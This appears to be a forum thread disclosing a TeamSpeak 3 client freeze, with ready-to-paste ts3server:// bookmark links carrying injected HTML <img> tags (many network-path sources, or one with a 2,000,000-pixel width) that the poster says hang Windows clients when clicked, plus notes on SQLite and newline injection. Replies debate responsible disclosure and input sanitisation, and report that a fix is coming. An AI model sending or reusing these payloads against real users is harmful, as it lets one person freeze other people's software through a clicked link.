TeamSpeak 3 addbookmark client freeze

[Asphyxia]

[url=ts3server://localhost?addbookmark=<img%20source=//a/a><img%20source=//b/b><img%20source=//c/c><img%20source=//d/d><img%20source=//e/e><img%20source=//f/f><img%20source=//z/z><img%20source=//w/w><img%20source=//zz/zz><img%20source=//ad/ad><img%20source=//ffa/ffa><img%20source=//a3/33a><img%20source=//aa43/fa33a><img%20source=//awfea/2343aa><img%20source=//awfe22a/232243aa><img%20source=//awf90ea/234903aa><img%20source=//awz4fea/23443fgaa><img%20source=//ab54wfea/2343z45aa><img%20source=//azas46wfea/234365aaa><img%20source=//awff35ea/2343aawa23a><img%20source=//awfa344ea/245343aa>&nickname=UserNickname]https://www.youtube.com/watch?v=ZbZSe6N_BXs[/url]

This could possibly cause Windows clients to freeze up (thinking related to network shares).

Also, apparently if you get a wide enough image that'll do rather well:

[url=ts3server://localhost?addbookmark=<img%20width=2000000%20source=//a/a>&nickname=UserNickname]https://www.youtube.com/watch?v=ZbZSe6N_BXs[/url]

...

lastly, I found editing the SQLite DB to contain a server nickname with a bunch of messed up <img> sourcing (src=) top-like.. will cause freezing on connect to a server. This does require user interaction of course but is a good example of how TeamSpeak still has some work to make their software safer and more free from bugs.

Even more, channel and server names permit editing in newline characters which distort the list showing server/channel name(s).

 

[unspecified]

It was a ton of fun finding these. Cheers for the good night haha. Gotta do that again at some point :]

 

[Asphyxia]

video is live

 

[BennetGallein]

Is this reported to TeamSpeak already? It is against ethical standards to just publish such an important vulnerability without giving the company time to respond.

 

[Zalati]

It was very fun to help finding this. Best night since a long time

 

[Asphyxia]

Is this reported to TeamSpeak already?

Actually we have reported a lot of issues to TeamSpeak, check here https://r4p3.net/resources/exploit-overview.84/

 

[tagKnife]

Another QT bug. Teamspeak needs to just drop QT.

 

[Asphyxia]

Another QT bug. Teamspeak needs to just drop QT.

That’s partially true, it is the QT developer’s job to responsibly handle inputs. For example, where QT renders html, maybe strip all HTML characters e.g. “<“ and “>” along with the url encoded equivalents just for double measure.

Validate, sanitize, and just make all input and output clean. When developers overlook the in and out they get lions mixed up with sheep.

 

[Asphyxia]

Apparently they are going to fix this, hooray!

TeamSpeak

Official TeamSpeak Community Forum

forum.teamspeak.com